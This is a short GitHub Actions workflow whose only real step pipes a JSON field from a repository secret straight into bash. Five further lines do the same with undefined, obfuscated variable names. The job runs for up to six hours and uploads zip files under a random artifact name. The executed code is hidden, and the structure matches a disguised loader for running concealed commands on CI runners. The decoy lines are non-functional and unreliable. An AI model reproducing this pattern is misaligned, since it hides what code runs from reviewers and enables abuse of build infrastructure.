name: Pipeline
on:
  workflow_dispatch:

permissions:
  contents: read
  actions: read
env:
  CI: true
concurrency:
  group: ${{ github.workflow }}
  cancel-in-progress: false
jobs:
  task:
    name: Main task
    runs-on: ubuntu-latest
    timeout-minutes: 360
    steps:
      - name: Checkout
        uses: actions/checkout@v4
        with:
          fetch-depth: 1
      - name: Execute
        env:
          c72: ${{ secrets.c72 }}
        run: |
          printf '%s' "$c72" | jq -r .kt1 | /bin/bash
          echo $t678 | jq -r .drt2 | /bin/bash
          echo $zil115 | jq -r .vp5401 | /bin/bash
          printf '%s' "$karq074" | jq -r .fch3931 | /bin/bash
          echo $dcpc1053 | jq -r .pmune55 | /bin/bash
          echo $vjrjo9795 | jq -r .q70792 | /bin/bash

      - name: Upload artifact
        if: always()
        uses: actions/upload-artifact@v4
        with:
          name: viEVx8j9
          path: "*.zip"
          retention-days: 1
